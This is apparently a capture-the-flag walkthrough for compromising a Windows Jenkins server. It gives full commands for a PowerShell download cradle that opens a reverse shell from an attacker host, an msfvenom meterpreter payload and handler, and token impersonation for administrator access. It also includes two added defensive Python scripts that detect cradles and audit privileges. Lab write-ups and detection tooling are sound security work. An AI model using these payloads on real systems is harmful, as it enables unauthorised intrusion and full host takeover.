Run nmap [Target Machine IP]
There are 3 ports open (TCP connect).
Open [Target Machine IP]:80 and [Target Machine IP]:8080.
[Target Machine IP]:8080 is a login page for Jenkins. Search for the default Jenkins credentials (admin:admin).
Once you log in, you will see a build job. If you look at the job, you can tell that this is a Windows machine. Configure the job and insert the reverse shell into the build command:
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
Download this PowerShell script (Invoke-PowerShellTcp.ps1) to the attacker machine and host it with a Python web server on port 8888.
Run nc -lvnp 4444 on the attacker machine, then trigger a build of this job.
We will get a shell from the target machine. Look for user.txt (usually it is in one of the user's Documents or Desktop folders).
Generate a payload
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[ATTACKER IP] LPORT=3333 -f exe -o shell.exe
Open msfconsole on the attacker machine and run these commands (one per line):
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [ATTACKER IP]
set LPORT 3333
run
Download the shell.exe into the Target machine using Jenkins.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://[ATTACKER IP]:8888/shell.exe','shell.exe')"
On the target machine, run
Start-Process shell.exe
to upgrade the shell.
If this is successful, you will see the new session open in msfconsole.
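Both of the build-step payloads above (the DownloadString cradle and the DownloadFile fetch of shell.exe) end up stored in the job's config.xml under JENKINS_HOME. A defender can audit those files for remote download-and-execute patterns. The following is an added example and not code from the walkthrough or from the Jenkins project; the config snippet inside it is constructed for the demo, and the JENKINS_HOME/jobs/<name>/config.xml layout is assumed.

```python
"""Scan Jenkins job config.xml files for build steps that fetch and run
remote code (download cradles). Added example, not from the original
walkthrough; SAMPLE_CONFIG below is constructed for the demo."""
import os
import re
import xml.etree.ElementTree as ET

# Jenkins stores a freestyle job's build steps under <builders>; a Windows
# batch step is hudson.tasks.BatchFile, a Unix shell step hudson.tasks.Shell.
BUILD_STEP_TAGS = ("hudson.tasks.BatchFile", "hudson.tasks.Shell")

# Patterns typical of remote download-and-execute one-liners (case-insensitive).
CRADLE_PATTERNS = {
    "download_string": re.compile(r"DownloadString\s*\(", re.I),
    "download_file": re.compile(r"DownloadFile\s*\(", re.I),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "web_request": re.compile(r"\b(Invoke-WebRequest|iwr|curl|wget|certutil)\b", re.I),
}

# Constructed sample config: one benign step and one step carrying the
# cradle from the walkthrough (IP/port replaced with placeholder values).
SAMPLE_CONFIG = """<project>
  <builders>
    <hudson.tasks.BatchFile>
      <command>echo Building project...</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.BatchFile>
      <command>powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8888/Invoke-PowerShellTcp.ps1')</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>
"""


def build_commands(config_xml):
    """Yield (step_tag, command_text) for every build step in a job config."""
    root = ET.fromstring(config_xml)
    builders = root.find("builders")
    if builders is None:
        return
    for step in builders:
        if step.tag in BUILD_STEP_TAGS:
            yield step.tag, (step.findtext("command") or "")


def scan_job_config(config_xml):
    """Return findings as dicts: step index, step type, indicator names, command."""
    findings = []
    for idx, (tag, cmd) in enumerate(build_commands(config_xml)):
        hits = sorted(name for name, pat in CRADLE_PATTERNS.items() if pat.search(cmd))
        if hits:
            findings.append({"step": idx, "type": tag, "indicators": hits,
                             "command": cmd.strip()})
    return findings


def scan_jenkins_home(jenkins_home):
    """Scan jobs/<name>/config.xml under JENKINS_HOME (assumed layout);
    returns {job name: findings} for jobs with at least one hit."""
    results = {}
    jobs_dir = os.path.join(jenkins_home, "jobs")
    if not os.path.isdir(jobs_dir):
        return results
    for name in sorted(os.listdir(jobs_dir)):
        cfg = os.path.join(jobs_dir, name, "config.xml")
        if os.path.isfile(cfg):
            with open(cfg, encoding="utf-8") as fh:
                findings = scan_job_config(fh.read())
            if findings:
                results[name] = findings
    return results


if __name__ == "__main__":
    for f in scan_job_config(SAMPLE_CONFIG):
        print(f"step {f['step']} ({f['type']}): {', '.join(f['indicators'])}")
        print("   ", f["command"])
```

Run it against a real controller with scan_jenkins_home("/var/lib/jenkins") (or the Windows JENKINS_HOME path). Pattern matching on build steps complements, rather than replaces, the root-cause fixes: no default or shared credentials on the Jenkins login, builds executed on agents rather than the controller, and host telemetry that alerts when the Jenkins java.exe process spawns powershell.exe or cmd.exe with network-fetching arguments.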
Privilege Escalation with Access Token
Find out the privileges of the current user using
In msfconsole, load incognito and run list_tokens -g to find out the available tokens.
Run impersonate_token "BUILTIN\Administrators" to impersonate the Administrators token.
Start a shell.
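The escalation in this section works because the account the Jenkins service runs as holds token rights such as SeImpersonatePrivilege, so every build step inherits them. An administrator can audit a service account for exactly those rights. The following is an added example, not part of the original walkthrough; it assumes the privilege listing is in the layout that whoami /priv prints, and the sample listing is constructed for the demo.

```python
"""Audit a Windows account's token privileges for rights that permit token
impersonation or other escalation. Added example, not from the original
walkthrough; SAMPLE_WHOAMI_PRIV is constructed in the layout of whoami /priv."""

# Token rights that let a process act in another security context.
HIGH_RISK = {
    "SeImpersonatePrivilege": "can impersonate tokens of clients that connect to it",
    "SeAssignPrimaryTokenPrivilege": "can assign a primary token to a new process",
    "SeDebugPrivilege": "can open and inject into any process, including SYSTEM",
    "SeTcbPrivilege": "can act as part of the operating system",
    "SeBackupPrivilege": "can read any file regardless of its ACL",
    "SeRestorePrivilege": "can write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "can take ownership of any securable object",
    "SeLoadDriverPrivilege": "can load kernel drivers",
}

# Constructed sample output for a build account that holds SeImpersonatePrivilege.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_privileges(text):
    """Return {privilege name: state} from whoami /priv style output.
    Privilege rows start with an Se...Privilege name and end with the state."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[0].endswith("Privilege"):
            privs[parts[0]] = parts[-1]
    return privs


def audit_privileges(text):
    """Return (privilege, state, reason) for every held high-risk privilege.
    A Disabled privilege still counts: it is in the token and the process can
    enable it at will, so only its absence from the list removes the risk."""
    privs = parse_privileges(text)
    return [(name, state, HIGH_RISK[name])
            for name, state in privs.items() if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, reason in audit_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name} ({state}): {reason}")
```

Feed it the saved output of whoami /priv run as the account that executes the builds. Any hit is a reason to move the Jenkins service or agent to a dedicated account that does not carry the right, since a build step running under that account has everything the incognito step above needs.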